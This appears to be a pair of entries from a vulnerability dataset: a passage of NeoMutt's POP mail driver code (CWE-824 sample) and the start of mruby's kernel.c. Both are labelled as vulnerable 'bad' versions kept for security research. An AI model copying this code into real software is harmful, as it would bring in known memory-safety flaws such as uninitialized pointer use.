{
if (rc == 0)
{
pop_data->cmd_top = 1;
mutt_debug(1, "set TOP capability\n");
}
if (rc == -2)
{
pop_data->cmd_top = 0;
mutt_debug(1, "unset TOP capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command TOP is not supported by server."));
}
}
}
switch (rc)
{
case 0:
{
rewind(f);
h->env = mutt_rfc822_read_header(f, h, 0, 0);
h->content->length = length - h->content->offset + 1;
rewind(f);
while (!feof(f))
{
h->content->length--;
fgets(buf, sizeof(buf), f);
}
break;
}
case -2:
{
mutt_error("%s", pop_data->err_msg);
break;
}
case -3:
{
mutt_error(_("Can't write header to temporary file!"));
break;
}
}
mutt_file_fclose(&f);
return rc;
}
/**
* fetch_uidl - parse UIDL
* @param line String to parse
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_uidl(char *line, void *data)
{
int i, index;
struct Context *ctx = (struct Context *) data;
struct PopData *pop_data = (struct PopData *) ctx->data;
char *endp = NULL;
errno = 0;
index = strtol(line, &endp, 10);
if (errno)
return -1;
while (*endp == ' ')
endp++;
memmove(line, endp, strlen(endp) + 1);
for (i = 0; i < ctx->msgcount; i++)
if (mutt_str_strcmp(line, ctx->hdrs[i]->data) == 0)
break;
if (i == ctx->msgcount)
{
mutt_debug(1, "new header %d %s\n", index, line);
if (i >= ctx->hdrmax)
mx_alloc_memory(ctx);
ctx->msgcount++;
ctx->hdrs[i] = mutt_header_new();
ctx->hdrs[i]->data = mutt_str_strdup(line);
}
else if (ctx->hdrs[i]->index != index - 1)
pop_data->clear_cache = true;
ctx->hdrs[i]->refno = index;
ctx->hdrs[i]->index = index - 1;
return 0;
}
/**
* msg_cache_check - Check the Body Cache for an ID
* @param id Cache ID
* @param bcache Body cache
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int msg_cache_check(const char *id, struct BodyCache *bcache, void *data)
{
struct Context *ctx = (struct Context *) data;
if (!ctx)
return -1;
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return -1;
#ifdef USE_HCACHE
/* keep hcache file if hcache == bcache */
if (strcmp(HC_FNAME "." HC_FEXT, id) == 0)
return 0;
#endif
for (int i = 0; i < ctx->msgcount; i++)
{
/* if the id we get is known for a header: done (i.e. keep in cache) */
if (ctx->hdrs[i]->data && (mutt_str_strcmp(ctx->hdrs[i]->data, id) == 0))
return 0;
}
/* message not found in context -> remove it from cache
* return the result of bcache, so we stop upon its first error
*/
return mutt_bcache_del(bcache, cache_id(id));
}
#ifdef USE_HCACHE
/**
* pop_hcache_namer - Create a header cache filename for a POP mailbox
* @param path Path of mailbox
* @param dest Buffer for filename
* @param destlen Length of buffer
* @retval num Characters written to buffer
*/
static int pop_hcache_namer(const char *path, char *dest, size_t destlen)
{
return snprintf(dest, destlen, "%s." HC_FEXT, path);
}
/**
* pop_hcache_open - Open the header cache
* @param pop_data POP server data
* @param path Path to the mailbox
* @retval ptr Header cache
*/
static header_cache_t *pop_hcache_open(struct PopData *pop_data, const char *path)
{
struct Url url;
char p[LONG_STRING];
if (!pop_data || !pop_data->conn)
return mutt_hcache_open(HeaderCache, path, NULL);
mutt_account_tourl(&pop_data->conn->account, &url);
url.path = HC_FNAME;
url_tostring(&url, p, sizeof(p), U_PATH);
return mutt_hcache_open(HeaderCache, p, pop_hcache_namer);
}
#endif
/**
* pop_fetch_headers - Read headers
* @param ctx Context
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_fetch_headers(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = pop_hcache_open(pop_data, ctx->path);
#endif
time(&pop_data->check_time);
pop_data->clear_cache = false;
for (int i = 0; i < ctx->msgcount; i++)
ctx->hdrs[i]->refno = -1;
const int old_count = ctx->msgcount;
int ret = pop_fetch_data(pop_data, "UIDL\r\n", NULL, fetch_uidl, ctx);
const int new_count = ctx->msgcount;
ctx->msgcount = old_count;
if (pop_data->cmd_uidl == 2)
{
if (ret == 0)
{
pop_data->cmd_uidl = 1;
mutt_debug(1, "set UIDL capability\n");
}
if (ret == -2 && pop_data->cmd_uidl == 2)
{
pop_data->cmd_uidl = 0;
mutt_debug(1, "unset UIDL capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command UIDL is not supported by server."));
}
}
if (!ctx->quiet)
{
mutt_progress_init(&progress, _("Fetching message headers..."),
MUTT_PROGRESS_MSG, ReadInc, new_count - old_count);
}
if (ret == 0)
{
int i, deleted;
for (i = 0, deleted = 0; i < old_count; i++)
{
if (ctx->hdrs[i]->refno == -1)
{
ctx->hdrs[i]->deleted = true;
deleted++;
}
}
if (deleted > 0)
{
mutt_error(
ngettext("%d message has been lost. Try reopening the mailbox.",
"%d messages have been lost. Try reopening the mailbox.", deleted),
deleted);
}
bool hcached = false;
for (i = old_count; i < new_count; i++)
{
if (!ctx->quiet)
mutt_progress_update(&progress, i + 1 - old_count, -1);
#ifdef USE_HCACHE
void *data = mutt_hcache_fetch(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
if (data)
{
char *uidl = mutt_str_strdup(ctx->hdrs[i]->data);
int refno = ctx->hdrs[i]->refno;
int index = ctx->hdrs[i]->index;
/*
* - POP dynamically numbers headers and relies on h->refno
* to map messages; so restore header and overwrite restored
* refno with current refno, same for index
* - h->data needs to a separate pointer as it's driver-specific
* data freed separately elsewhere
* (the old h->data should point inside a malloc'd block from
* hcache so there shouldn't be a memleak here)
*/
struct Header *h = mutt_hcache_restore((unsigned char *) data);
mutt_hcache_free(hc, &data);
mutt_header_free(&ctx->hdrs[i]);
ctx->hdrs[i] = h;
ctx->hdrs[i]->refno = refno;
ctx->hdrs[i]->index = index;
ctx->hdrs[i]->data = uidl;
ret = 0;
hcached = true;
}
else
#endif
if ((ret = pop_read_header(pop_data, ctx->hdrs[i])) < 0)
break;
#ifdef USE_HCACHE
else
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
/*
* faked support for flags works like this:
* - if 'hcached' is true, we have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: old
* (if $mark_old is set which is maybe wrong as
* $mark_old should be considered for syncing the
* folder and not when opening it XXX)
* - if 'hcached' is false, we don't have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: new
*/
const bool bcached =
(mutt_bcache_exists(pop_data->bcache, cache_id(ctx->hdrs[i]->data)) == 0);
ctx->hdrs[i]->old = false;
ctx->hdrs[i]->read = false;
if (hcached)
{
if (bcached)
ctx->hdrs[i]->read = true;
else if (MarkOld)
ctx->hdrs[i]->old = true;
}
else
{
if (bcached)
ctx->hdrs[i]->read = true;
}
ctx->msgcount++;
}
if (i > old_count)
mx_update_context(ctx, i - old_count);
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret < 0)
{
for (int i = ctx->msgcount; i < new_count; i++)
mutt_header_free(&ctx->hdrs[i]);
return ret;
}
/* after putting the result into our structures,
* clean up cache, i.e. wipe messages deleted outside
* the availability of our cache
*/
if (MessageCacheClean)
mutt_bcache_list(pop_data->bcache, msg_cache_check, (void *) ctx);
mutt_clear_error();
return (new_count - old_count);
}
/**
* pop_open_mailbox - open POP mailbox, fetch only headers
* @param ctx Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_open_mailbox(struct Context *ctx)
{
char buf[PATH_MAX];
struct Connection *conn = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
struct Url url;
if (pop_parse_path(ctx->path, &acct))
{
mutt_error(_("%s is an invalid POP path"), ctx->path);
return -1;
}
mutt_account_tourl(&acct, &url);
url.path = NULL;
url_tostring(&url, buf, sizeof(buf), 0);
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return -1;
FREE(&ctx->path);
FREE(&ctx->realpath);
ctx->path = mutt_str_strdup(buf);
ctx->realpath = mutt_str_strdup(ctx->path);
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
ctx->data = pop_data;
if (pop_open_connection(pop_data) < 0)
return -1;
conn->data = pop_data;
pop_data->bcache = mutt_bcache_open(&acct, NULL);
/* init (hard-coded) ACL rights */
memset(ctx->rights, 0, sizeof(ctx->rights));
mutt_bit_set(ctx->rights, MUTT_ACL_SEEN);
mutt_bit_set(ctx->rights, MUTT_ACL_DELETE);
#ifdef USE_HCACHE
/* flags are managed using header cache, so it only makes sense to
* enable them in that case */
mutt_bit_set(ctx->rights, MUTT_ACL_WRITE);
#endif
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Fetching list of messages..."));
const int ret = pop_fetch_headers(ctx);
if (ret >= 0)
return 0;
if (ret < -1)
{
mutt_sleep(2);
return -1;
}
}
}
/**
* pop_clear_cache - delete all cached messages
* @param pop_data POP server data
*/
static void pop_clear_cache(struct PopData *pop_data)
{
if (!pop_data->clear_cache)
return;
mutt_debug(1, "delete cached messages\n");
for (int i = 0; i < POP_CACHE_LEN; i++)
{
if (pop_data->cache[i].path)
{
unlink(pop_data->cache[i].path);
FREE(&pop_data->cache[i].path);
}
}
}
/**
* pop_close_mailbox - close POP mailbox
* @param ctx Mailbox Context
* @retval 0 Always
*/
static int pop_close_mailbox(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return 0;
pop_logout(ctx);
if (pop_data->status != POP_NONE)
mutt_socket_close(pop_data->conn);
pop_data->status = POP_NONE;
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
if (!pop_data->conn->data)
mutt_socket_free(pop_data->conn);
mutt_bcache_close(&pop_data->bcache);
return 0;
}
/**
* pop_fetch_message - fetch message from POP server
* @param ctx Mailbox Context
* @param msg Message
* @param msgno Message number
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_fetch_message(struct Context *ctx, struct Message *msg, int msgno)
{
void *uidl = NULL;
char buf[LONG_STRING];
char path[PATH_MAX];
struct Progress progressbar;
struct PopData *pop_data = (struct PopData *) ctx->data;
struct PopCache *cache = NULL;
struct Header *h = ctx->hdrs[msgno];
unsigned short bcache = 1;
/* see if we already have the message in body cache */
msg->fp = mutt_bcache_get(pop_data->bcache, cache_id(h->data));
if (msg->fp)
return 0;
/*
* see if we already have the message in our cache in
* case $message_cachedir is unset
*/
cache = &pop_data->cache[h->index % POP_CACHE_LEN];
if (cache->path)
{
if (cache->index == h->index)
{
/* yes, so just return a pointer to the message */
msg->fp = fopen(cache->path, "r");
if (msg->fp)
return 0;
mutt_perror(cache->path);
return -1;
}
else
{
/* clear the previous entry */
unlink(cache->path);
FREE(&cache->path);
}
}
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
/* verify that massage index is correct */
if (h->refno < 0)
{
mutt_error(
_("The message index is incorrect. Try reopening the mailbox."));
return -1;
}
mutt_progress_init(&progressbar, _("Fetching message..."), MUTT_PROGRESS_SIZE,
NetInc, h->content->length + h->content->offset - 1);
/* see if we can put in body cache; use our cache as fallback */
msg->fp = mutt_bcache_put(pop_data->bcache, cache_id(h->data));
if (!msg->fp)
{
/* no */
bcache = 0;
mutt_mktemp(path, sizeof(path));
msg->fp = mutt_file_fopen(path, "w+");
if (!msg->fp)
{
mutt_perror(path);
return -1;
}
}
snprintf(buf, sizeof(buf), "RETR %d\r\n", h->refno);
const int ret = pop_fetch_data(pop_data, buf, &progressbar, fetch_message, msg->fp);
if (ret == 0)
break;
mutt_file_fclose(&msg->fp);
/* if RETR failed (e.g. connection closed), be sure to remove either
* the file in bcache or from POP's own cache since the next iteration
* of the loop will re-attempt to put() the message */
if (!bcache)
unlink(path);
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
if (ret == -3)
{
mutt_error(_("Can't write message to temporary file!"));
return -1;
}
}
/* Update the header information. Previously, we only downloaded a
* portion of the headers, those required for the main display.
*/
if (bcache)
mutt_bcache_commit(pop_data->bcache, cache_id(h->data));
else
{
cache->index = h->index;
cache->path = mutt_str_strdup(path);
}
rewind(msg->fp);
uidl = h->data;
/* we replace envelop, key in subj_hash has to be updated as well */
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_delete(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_remove(ctx, h);
mutt_env_free(&h->env);
h->env = mutt_rfc822_read_header(msg->fp, h, 0, 0);
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_insert(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_add(ctx, h);
h->data = uidl;
h->lines = 0;
fgets(buf, sizeof(buf), msg->fp);
while (!feof(msg->fp))
{
ctx->hdrs[msgno]->lines++;
fgets(buf, sizeof(buf), msg->fp);
}
h->content->length = ftello(msg->fp) - h->content->offset;
/* This needs to be done in case this is a multipart message */
if (!WithCrypto)
h->security = crypt_query(h->content);
mutt_clear_error();
rewind(msg->fp);
return 0;
}
/**
* pop_close_message - Close POP Message
* @param ctx Mailbox Context
* @param msg Message
* @retval 0 Success
* @retval EOF Error, see errno
*/
static int pop_close_message(struct Context *ctx, struct Message *msg)
{
return mutt_file_fclose(&msg->fp);
}
/**
* pop_sync_mailbox - update POP mailbox, delete messages from server
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_sync_mailbox(struct Context *ctx, int *index_hint)
{
int i, j, ret = 0;
char buf[LONG_STRING];
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = NULL;
#endif
pop_data->check_time = 0;
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
mutt_progress_init(&progress, _("Marking messages deleted..."),
MUTT_PROGRESS_MSG, WriteInc, ctx->deleted);
#ifdef USE_HCACHE
hc = pop_hcache_open(pop_data, ctx->path);
#endif
for (i = 0, j = 0, ret = 0; ret == 0 && i < ctx->msgcount; i++)
{
if (ctx->hdrs[i]->deleted && ctx->hdrs[i]->refno != -1)
{
j++;
if (!ctx->quiet)
mutt_progress_update(&progress, j, -1);
snprintf(buf, sizeof(buf), "DELE %d\r\n", ctx->hdrs[i]->refno);
ret = pop_query(pop_data, buf, sizeof(buf));
if (ret == 0)
{
mutt_bcache_del(pop_data->bcache, cache_id(ctx->hdrs[i]->data));
#ifdef USE_HCACHE
mutt_hcache_delete(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
#endif
}
}
#ifdef USE_HCACHE
if (ctx->hdrs[i]->changed)
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret == 0)
{
mutt_str_strfcpy(buf, "QUIT\r\n", sizeof(buf));
ret = pop_query(pop_data, buf, sizeof(buf));
}
if (ret == 0)
{
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
pop_data->status = POP_DISCONNECTED;
return 0;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
}
}
/**
* pop_check_mailbox - Check for new messages and fetch headers
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_check_mailbox(struct Context *ctx, int *index_hint)
{
int ret;
struct PopData *pop_data = (struct PopData *) ctx->data;
if ((pop_data->check_time + PopCheckinterval) > time(NULL))
return 0;
pop_logout(ctx);
mutt_socket_close(pop_data->conn);
if (pop_open_connection(pop_data) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Checking for new messages..."));
ret = pop_fetch_headers(ctx);
pop_clear_cache(pop_data);
if (ret < 0)
return -1;
if (ret > 0)
return MUTT_NEW_MAIL;
return 0;
}
/**
* pop_fetch_mail - Fetch messages and save them in $spoolfile
*/
void pop_fetch_mail(void)
{
char buffer[LONG_STRING];
char msgbuf[SHORT_STRING];
char *url = NULL, *p = NULL;
int delanswer, last = 0, msgs, bytes, rset = 0, ret;
struct Connection *conn = NULL;
struct Context ctx;
struct Message *msg = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
if (!PopHost)
{
mutt_error(_("POP host is not defined."));
return;
}
url = p = mutt_mem_calloc(strlen(PopHost) + 7, sizeof(char));
if (url_check_scheme(PopHost) == U_UNKNOWN)
{
strcpy(url, "pop://");
p = strchr(url, '\0');
}
strcpy(p, PopHost);
ret = pop_parse_path(url, &acct);
FREE(&url);
if (ret)
{
mutt_error(_("%s is an invalid POP path"), PopHost);
return;
}
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return;
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
if (pop_open_connection(pop_data) < 0)
{
mutt_socket_free(pop_data->conn);
FREE(&pop_data);
return;
}
conn->data = pop_data;
mutt_message(_("Checking for new messages..."));
/* find out how many messages are in the mailbox. */
mutt_str_strfcpy(buffer, "STAT\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
goto finish;
}
sscanf(buffer, "+OK %d %d", &msgs, &bytes);
/* only get unread messages */
if (msgs > 0 && PopLast)
{
mutt_str_strfcpy(buffer, "LAST\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == 0)
sscanf(buffer, "+OK %d", &last);
}
if (msgs <= last)
{
mutt_message(_("No new mail in POP mailbox."));
goto finish;
}
if (mx_mbox_open(NONULL(Spoolfile), MUTT_APPEND, &ctx) == NULL)
goto finish;
delanswer = query_quadoption(PopDelete, _("Delete messages from server?"));
snprintf(msgbuf, sizeof(msgbuf),
ngettext("Reading new messages (%d byte)...",
"Reading new messages (%d bytes)...", bytes),
bytes);
mutt_message("%s", msgbuf);
for (int i = last + 1; i <= msgs; i++)
{
msg = mx_msg_open_new(&ctx, NULL, MUTT_ADD_FROM);
if (!msg)
ret = -3;
else
{
snprintf(buffer, sizeof(buffer), "RETR %d\r\n", i);
ret = pop_fetch_data(pop_data, buffer, NULL, fetch_message, msg->fp);
if (ret == -3)
rset = 1;
if (ret == 0 && mx_msg_commit(&ctx, msg) != 0)
{
rset = 1;
ret = -3;
}
mx_msg_close(&ctx, &msg);
}
if (ret == 0 && delanswer == MUTT_YES)
{
/* delete the message on the server */
snprintf(buffer, sizeof(buffer), "DELE %d\r\n", i);
ret = pop_query(pop_data, buffer, sizeof(buffer));
}
if (ret == -1)
{
mx_mbox_close(&ctx, NULL);
goto fail;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
break;
}
if (ret == -3)
{
mutt_error(_("Error while writing mailbox!"));
break;
}
/* L10N: The plural is picked by the second numerical argument, i.e.
* the %d right before 'messages', i.e. the total number of messages. */
mutt_message(ngettext("%s [%d of %d message read]",
"%s [%d of %d messages read]", msgs - last),
msgbuf, i - last, msgs - last);
}
mx_mbox_close(&ctx, NULL);
if (rset)
{
/* make sure no messages get deleted */
mutt_str_strfcpy(buffer, "RSET\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
}
finish:
/* exit gracefully */
mutt_str_strfcpy(buffer, "QUIT\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
mutt_socket_close(conn);
FREE(&pop_data);
return;
fail:
mutt_error(_("Server closed connection!"));
mutt_socket_close(conn);
FREE(&pop_data);
}
// clang-format off
/**
* mx_pop_ops - Mailbox callback functions for POP mailboxes
*/
struct MxOps mx_pop_ops = {
.mbox_open = pop_open_mailbox,
.mbox_open_append = NULL,
.mbox_check = pop_check_mailbox,
.mbox_sync = pop_sync_mailbox,
.mbox_close = pop_close_mailbox,
.msg_open = pop_fetch_message,
.msg_open_new = NULL,
.msg_commit = NULL,
.msg_close = pop_close_message,
.tags_edit = NULL,
.tags_commit = NULL,
};
// clang-format on
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_250_0 |
crossvul-cpp_data_bad_168_0 | /*
** kernel.c - Kernel module
**
** See Copyright Notice in mruby.h
*/
#include <mruby.h>
#include <mruby/array.h>
#include <mruby/hash.h>
#include <mruby/class.h>
#include <mruby/proc.h>
#include <mruby/string.h>
#include <mruby/variable.h>
#include <mruby/error.h>
#include <mruby/istruct.h>
typedef enum {
NOEX_PUBLIC = 0x00,
NOEX_NOSUPER = 0x01,
NOEX_PRIVATE = 0x02,
NOEX_PROTECTED = 0x04,
NOEX_MASK = 0x06,
NOEX_BASIC = 0x08,
NOEX_UNDEF = NOEX_NOSUPER,
NOEX_MODFUNC = 0x12,
NOEX_SUPER = 0x20,
NOEX_VCALL = 0x40,
NOEX_RESPONDS = 0x80
} mrb_method_flag_t;
MRB_API mrb_bool
mrb_func_basic_p(mrb_state *mrb, mrb_value obj, mrb_sym mid, mrb_func_t func)
{
mrb_method_t m = mrb_method_search(mrb, mrb_class(mrb, obj), mid);
struct RProc *p;
if (MRB_METHOD_UNDEF_P(m)) return FALSE;
if (MRB_METHOD_FUNC_P(m))
return MRB_METHOD_FUNC(m) == func;
p = MRB_METHOD_PROC(m);
if (MRB_PROC_CFUNC_P(p) && (MRB_PROC_CFUNC(p) == func))
return TRUE;
return FALSE;
}
static mrb_bool
mrb_obj_basic_to_s_p(mrb_state *mrb, mrb_value obj)
{
return mrb_func_basic_p(mrb, obj, mrb_intern_lit(mrb, "to_s"), mrb_any_to_s);
}
/* 15.3.1.3.17 */
/*
* call-seq:
* obj.inspect -> string
*
* Returns a string containing a human-readable representation of
* <i>obj</i>. If not overridden and no instance variables, uses the
* <code>to_s</code> method to generate the string.
* <i>obj</i>. If not overridden, uses the <code>to_s</code> method to
* generate the string.
*
* [ 1, 2, 3..4, 'five' ].inspect #=> "[1, 2, 3..4, \"five\"]"
* Time.new.inspect #=> "2008-03-08 19:43:39 +0900"
*/
MRB_API mrb_value
mrb_obj_inspect(mrb_state *mrb, mrb_value obj)
{
if ((mrb_type(obj) == MRB_TT_OBJECT) && mrb_obj_basic_to_s_p(mrb, obj)) {
return mrb_obj_iv_inspect(mrb, mrb_obj_ptr(obj));
}
return mrb_any_to_s(mrb, obj);
}
/* 15.3.1.3.2 */
/*
* call-seq:
* obj === other -> true or false
*
* Case Equality---For class <code>Object</code>, effectively the same
* as calling <code>#==</code>, but typically overridden by descendants
* to provide meaningful semantics in <code>case</code> statements.
*/
static mrb_value
mrb_equal_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "o", &arg);
return mrb_bool_value(mrb_equal(mrb, self, arg));
}
/* 15.3.1.3.3 */
/* 15.3.1.3.33 */
/*
* Document-method: __id__
* Document-method: object_id
*
* call-seq:
* obj.__id__ -> fixnum
* obj.object_id -> fixnum
*
* Returns an integer identifier for <i>obj</i>. The same number will
* be returned on all calls to <code>id</code> for a given object, and
* no two active objects will share an id.
* <code>Object#object_id</code> is a different concept from the
* <code>:name</code> notation, which returns the symbol id of
* <code>name</code>. Replaces the deprecated <code>Object#id</code>.
*/
mrb_value
mrb_obj_id_m(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.2.2 */
/* 15.3.1.2.5 */
/* 15.3.1.3.6 */
/* 15.3.1.3.25 */
/*
* call-seq:
* block_given? -> true or false
* iterator? -> true or false
*
* Returns <code>true</code> if <code>yield</code> would execute a
* block in the current context. The <code>iterator?</code> form
* is mildly deprecated.
*
* def try
* if block_given?
* yield
* else
* "no block"
* end
* end
* try #=> "no block"
* try { "hello" } #=> "hello"
* try do "hello" end #=> "hello"
*/
static mrb_value
mrb_f_block_given_p_m(mrb_state *mrb, mrb_value self)
{
mrb_callinfo *ci = &mrb->c->ci[-1];
mrb_callinfo *cibase = mrb->c->cibase;
mrb_value *bp;
struct RProc *p;
if (ci <= cibase) {
/* toplevel does not have block */
return mrb_false_value();
}
p = ci->proc;
/* search method/class/module proc */
while (p) {
if (MRB_PROC_SCOPE_P(p)) break;
p = p->upper;
}
if (p == NULL) return mrb_false_value();
/* search ci corresponding to proc */
while (cibase < ci) {
if (ci->proc == p) break;
ci--;
}
if (ci == cibase) {
return mrb_false_value();
}
else if (ci->env) {
struct REnv *e = ci->env;
int bidx;
/* top-level does not have block slot (always false) */
if (e->stack == mrb->c->stbase)
return mrb_false_value();
/* use saved block arg position */
bidx = MRB_ENV_BIDX(e);
/* bidx may be useless (e.g. define_method) */
if (bidx >= MRB_ENV_STACK_LEN(e))
return mrb_false_value();
bp = &e->stack[bidx];
}
else {
bp = ci[1].stackent+1;
if (ci->argc >= 0) {
bp += ci->argc;
}
else {
bp++;
}
}
if (mrb_nil_p(*bp))
return mrb_false_value();
return mrb_true_value();
}
/* 15.3.1.3.7 */
/*
* call-seq:
* obj.class -> class
*
* Returns the class of <i>obj</i>. This method must always be
* called with an explicit receiver, as <code>class</code> is also a
* reserved word in Ruby.
*
* 1.class #=> Fixnum
* self.class #=> Object
*/
static mrb_value
mrb_obj_class_m(mrb_state *mrb, mrb_value self)
{
return mrb_obj_value(mrb_obj_class(mrb, self));
}
static struct RClass*
mrb_singleton_class_clone(mrb_state *mrb, mrb_value obj)
{
struct RClass *klass = mrb_basic_ptr(obj)->c;
if (klass->tt != MRB_TT_SCLASS)
return klass;
else {
/* copy singleton(unnamed) class */
struct RClass *clone = (struct RClass*)mrb_obj_alloc(mrb, klass->tt, mrb->class_class);
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_SCLASS:
break;
default:
clone->c = mrb_singleton_class_clone(mrb, mrb_obj_value(klass));
break;
}
clone->super = klass->super;
if (klass->iv) {
mrb_iv_copy(mrb, mrb_obj_value(clone), mrb_obj_value(klass));
mrb_obj_iv_set(mrb, (struct RObject*)clone, mrb_intern_lit(mrb, "__attached__"), obj);
}
if (klass->mt) {
clone->mt = kh_copy(mt, mrb, klass->mt);
}
else {
clone->mt = kh_init(mt, mrb);
}
clone->tt = MRB_TT_SCLASS;
return clone;
}
}
static void
copy_class(mrb_state *mrb, mrb_value dst, mrb_value src)
{
struct RClass *dc = mrb_class_ptr(dst);
struct RClass *sc = mrb_class_ptr(src);
/* if the origin is not the same as the class, then the origin and
the current class need to be copied */
if (sc->flags & MRB_FLAG_IS_PREPENDED) {
struct RClass *c0 = sc->super;
struct RClass *c1 = dc;
/* copy prepended iclasses */
while (!(c0->flags & MRB_FLAG_IS_ORIGIN)) {
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1 = c1->super;
c0 = c0->super;
}
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1->super->flags |= MRB_FLAG_IS_ORIGIN;
}
if (sc->mt) {
dc->mt = kh_copy(mt, mrb, sc->mt);
}
else {
dc->mt = kh_init(mt, mrb);
}
dc->super = sc->super;
MRB_SET_INSTANCE_TT(dc, MRB_INSTANCE_TT(sc));
}
static void
init_copy(mrb_state *mrb, mrb_value dest, mrb_value obj)
{
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_MODULE:
copy_class(mrb, dest, obj);
mrb_iv_copy(mrb, dest, obj);
mrb_iv_remove(mrb, dest, mrb_intern_lit(mrb, "__classname__"));
break;
case MRB_TT_OBJECT:
case MRB_TT_SCLASS:
case MRB_TT_HASH:
case MRB_TT_DATA:
case MRB_TT_EXCEPTION:
mrb_iv_copy(mrb, dest, obj);
break;
case MRB_TT_ISTRUCT:
mrb_istruct_copy(dest, obj);
break;
default:
break;
}
mrb_funcall(mrb, dest, "initialize_copy", 1, obj);
}
/* 15.3.1.3.8 */
/*
* call-seq:
* obj.clone -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference. Copies
* the frozen state of <i>obj</i>. See also the discussion
* under <code>Object#dup</code>.
*
* class Klass
* attr_accessor :str
* end
* s1 = Klass.new #=> #<Klass:0x401b3a38>
* s1.str = "Hello" #=> "Hello"
* s2 = s1.clone #=> #<Klass:0x401b3998 @str="Hello">
* s2.str[1,4] = "i" #=> "i"
* s1.inspect #=> "#<Klass:0x401b3a38 @str=\"Hi\">"
* s2.inspect #=> "#<Klass:0x401b3998 @str=\"Hi\">"
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*
* Some Class(True False Nil Symbol Fixnum Float) Object cannot clone.
*/
MRB_API mrb_value
mrb_obj_clone(mrb_state *mrb, mrb_value self)
{
struct RObject *p;
mrb_value clone;
if (mrb_immediate_p(self)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't clone %S", self);
}
if (mrb_type(self) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't clone singleton class");
}
p = (struct RObject*)mrb_obj_alloc(mrb, mrb_type(self), mrb_obj_class(mrb, self));
p->c = mrb_singleton_class_clone(mrb, self);
mrb_field_write_barrier(mrb, (struct RBasic*)p, (struct RBasic*)p->c);
clone = mrb_obj_value(p);
init_copy(mrb, clone, self);
return clone;
}
/* 15.3.1.3.9 */
/*
* call-seq:
* obj.dup -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference.
* <code>dup</code> copies the frozen state of <i>obj</i>. See also
* the discussion under <code>Object#clone</code>. In general,
* <code>clone</code> and <code>dup</code> may have different semantics
* in descendant classes. While <code>clone</code> is used to duplicate
* an object, including its internal state, <code>dup</code> typically
* uses the class of the descendant object to create the new instance.
*
